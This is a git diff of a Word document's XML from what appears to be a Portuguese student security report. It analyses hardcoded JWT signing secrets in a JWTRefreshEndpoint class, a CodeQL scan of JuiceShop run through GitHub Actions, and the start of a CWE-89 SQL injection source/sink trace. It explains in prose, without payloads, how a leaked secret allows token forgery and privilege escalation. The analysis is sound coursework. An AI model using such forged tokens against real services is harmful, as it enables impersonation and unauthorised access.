         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4821,23 +4462,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ao clicar a segunda entrada na lista (A.4.b), encontramo-nos na classe </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>JWTRefreshEndpoint</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (ficheiro JWTRefreshEndpoint.java). Ao analisar o código, é possível compreender que esta classe </w:t>
+        <w:t xml:space="preserve">Ao clicar a segunda entrada na lista (A.4.b), encontramo-nos na classe JWTRefreshEndpoint (ficheiro JWTRefreshEndpoint.java). Ao analisar o código, é possível compreender que esta classe </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4867,7 +4492,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> como um controlador da </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4877,7 +4501,6 @@
         </w:rPr>
         <w:t>framework</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4885,7 +4508,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4895,7 +4517,6 @@
         </w:rPr>
         <w:t>spring</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4922,7 +4543,6 @@
         </w:rPr>
         <w:t xml:space="preserve">De uma forma simplificada, esta </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4932,7 +4552,6 @@
         </w:rPr>
         <w:t>framework</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4975,7 +4594,6 @@
         </w:rPr>
         <w:t xml:space="preserve">em </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4985,7 +4603,6 @@
         </w:rPr>
         <w:t>endpoints</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4993,7 +4610,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> mapeados pelo próprio controlador através de anotações. Este controlador disponibiliza e gere os seguintes </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5001,17 +4617,7 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>endpoints</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>endpoints:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5184,19 +4790,8 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Web </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Token</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Web Token</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5268,7 +4863,6 @@
         </w:rPr>
         <w:t xml:space="preserve">, é possível encontrar duas </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5276,17 +4870,7 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>hardcoded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> passwords</w:t>
+        <w:t>hardcoded passwords</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5392,6 +4976,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
       <w:r>
@@ -5417,7 +5002,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> é utilizada no método </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5427,7 +5011,6 @@
         </w:rPr>
         <w:t>follow</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5435,7 +5018,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5445,29 +5027,12 @@
         </w:rPr>
         <w:t>endpoint</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> JWT/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>refresh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/login) para verificar se a </w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> JWT/refresh/login) para verificar se a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5515,7 +5080,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> é utilizada no método </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5525,7 +5089,6 @@
         </w:rPr>
         <w:t>createNewTokens</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5533,7 +5096,6 @@
         </w:rPr>
         <w:t xml:space="preserve">, utilizado no método </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5543,7 +5105,6 @@
         </w:rPr>
         <w:t>follow</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5551,7 +5112,6 @@
         </w:rPr>
         <w:t xml:space="preserve">, para assinar o novo </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5561,7 +5121,6 @@
         </w:rPr>
         <w:t>token</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5583,41 +5142,8 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>endpoint</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> JWT/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>refresh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/checkout) e </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> (endpoint JWT/refresh/checkout) e </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5627,47 +5153,13 @@
         </w:rPr>
         <w:t>newToken</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>endpoint</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /JWT/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>refresh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/checkout) para verificar a assinatura digital enviada no </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (endpoint /JWT/refresh/checkout) para verificar a assinatura digital enviada no </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5677,7 +5169,6 @@
         </w:rPr>
         <w:t>token</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5702,7 +5193,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Através desta assinatura digital do usada no JTW é possível garantir que apenas os pedidos enviados para estes </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5712,7 +5202,6 @@
         </w:rPr>
         <w:t>endpoints</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5735,10 +5224,8 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Se um utilizador malicioso descobrir este segredo (A.4.c), poderá enviar pedidos validos para estes </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5748,7 +5235,6 @@
         </w:rPr>
         <w:t>endpoints</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5756,7 +5242,6 @@
         </w:rPr>
         <w:t xml:space="preserve">, fazendo se passar por outros utilizadores e podendo até escalar os seus privilégios. Se este segredo for usado também noutros serviços, mesmo não estando </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5766,26 +5251,2926 @@
         </w:rPr>
         <w:t>hardcoded</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>, ele poderá também explorá-los para o seu proveito.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc213030678"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>B/C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>JuiceShop github execution</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc213030679"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL análise</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Depois de modificar o gatilho para workflow_dispatch e executar a action é possível verificar no output da etapa “Initialize CodeQL” o seguinte comando:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>/opt/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>hostedtoolcache</w:t>
+      </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>, ele poderá também explorá-los para o seu proveito.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>/2.23.3/x64/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>codeql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>codeql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> database </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --force-overwrite --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>db</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>-cluster /home/runner/work/_temp/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>codeql_databases</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --source-root=/home/runner/work/cs-mod2-security-in-software-gn_11/cs-mod2-security-in-software-gn_11 --calculate-language-specific-baseline --extractor-include-aliases --sublanguage-file-coverage --language=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>codescanning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>-config=/home/runner/work/_temp/user-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>config.yaml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>Que é o responsável por inicializar a base de dados com os metadados especificados através da flag “—source-root=/home/runner/work/cs-mod2-security-in-software-gn_11/cs-mod2-security-in-software-gn_11”.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>A base de dados fica guardada num workspace gerido pelo Github Actions, temporariamente guardado até o workflow terminar.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc213030680"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CWE-89</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>O CodeQL identifica esta vulnerabilidade porque não houve qualquer tratamento/sanitazicação do source até ao sink.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>O source</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">let criteria: any = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>req.query</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
